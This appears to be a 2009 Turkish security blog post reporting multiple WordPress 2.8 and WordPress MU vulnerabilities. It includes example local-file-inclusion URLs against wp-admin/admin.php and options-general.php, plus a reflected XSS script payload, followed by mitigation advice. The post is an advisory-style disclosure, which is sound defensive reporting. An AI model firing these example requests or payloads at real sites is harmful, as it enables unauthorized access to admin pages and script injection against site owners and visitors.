Şifre Kırıcılar ve Güvenli Bir Şifre (13238)
Kaspersky ve AntiVir'den 6 Aylık Ücretsiz Lisans (9740)
ActiveX Nedir? ActiveX ile Neler Yapılabilir? (9215)
XP SP3 Hakkında Bilmeniz Gerekenler (7616)
Microsoft Office Programları ve Güvenlik (6687)

Son Videolar

Kullanıcı girişi

Gezinti

Ağ günlüğü

daha fazla

Anket

Son yorumlar

guzel
9 hafta 4 gün önce
Güzel yazı
18 hafta 6 gün önce
Pek iyi bir şey olduğunu
19 hafta 1 gün önce
haftada 30 saatmi :) Ben
19 hafta 2 gün önce
sertifika güvenliği derken
19 hafta 2 gün önce
George Hotz
21 hafta 3 saat önce
Bazen 2 günde 30 saatten
21 hafta 2 gün önce
Radikal Karar
21 hafta 2 gün önce
Okurken Krizlere Girdim,
25 hafta 3 gün önce
Videoları .avi
25 hafta 3 gün önce

Kimler çevrimiçi

Şu an 1 kullanıcı ve 2 ziyaretçi çevrimiçi.

Çevrimiçi kullanıcılar

fuzbing

WordPress Çoklu Güvenlik Açıkları

Tarih: 9 Temmuz 2009, Per - Yazar: fuzbing - Etiketler:

Popüler içerik yönetim sistemi WordPress'te çoklu güvenlik açıkları tespit edildi. Buna göre çeşitli URL istekleriyle izinsiz olarak çeşitli eklenti ve ayar sayfalarına ulaşmak mümkün. Bunun yanı sıra çeşitli JavaScript kodlar ile bu eklentilere zararlı kodlar da eklenebiliyor.

Çeşitli eklentilerde bulunan zafiyetlerin tetiklediği güvenlik açıkları doğrudan admin.php ile de ilgili olabiliyor. Uzaktan (remote) olarak tarif edilen güvenlik açıkları şuan için WordPress 2.8 ve öncesini, WordPress MU 2.7.1 ve öncesini etkilemekte.

Örnek saldırılar:
Local File Inclusion için, admin.php?page=

http://[websayfası]/wp-admin/admin.php?page=/collapsing-archives/options.txt
http://[websayfası]/wp-admin/options-general.php?page=collapsing-archives/options.txt

Eklenti ayar modülündeki XSS için,

http://[websayfası]/wordpress/wp-admin/options-general.php?page=related-ways-to-take-action/options.php
http://[websayfası]/wp-admin/admin.php?page=related-ways-to-take-action/options.php
\"/><script>alert(String.fromCharCode(88)+String.fromCharCode(83)+String.fromCharCode(83))</script><ahref="

WP Security Scanner pano görüntüleme,

http://[websayfası]/wp-admin/admin.php?page=wp-security-scan/securityscan.php

Çözüm:
Wp-admin dizinine olan erişim kolaylığı yüzünden meydana gelen bu güvenlik açıkları yine bu klasörün kısıtlanmasıyla giderilebilir. Bunu apache'nin .htaccess dosyası yardımıyla yapabilirsiniz. Ya da WordPress'inizi son sürüme güncellemelisiniz.

Referans:
http://corelabs.coresecurity.com/index.php?action=view&type=advisory&nam...

Yorum göndermek için giriş yapın veya kayıt olun

İlgili Yazılar

Telif Hakkı

Bu yazının telif hakkı, içeriğinde aksi belirtilmemişse yazarına aittir ©. Yazının izin alınmadan ya da kaynak gösterilmeden kopyalanması ve kullanılması 5846 sayılı Fikir ve Sanat Eserleri Yasasına göre suçtur (forum ve bloglar dahil olmak üzere). Telif haklarına aykırı bir durumla karşılaşırsanız lütfen site yetkililerine bildiriniz.

Etiketler

Ağ Güvenliği Güvenlik Güvenlik Açıkları Haberler Hack Hacking Kriptografi Linux Makaleler Microsoft

daha fazla

Siteden

Güvenli.org: Hakkında | Gizlilik | İletişim

Kategoriler: Haberler | Makaleler | Güvenlik Açıkları

Rss Besleme: Ana Sayfa | Günlükler

Destekliyoruz

HackInTheBox
Belgeler.org

Üst Menü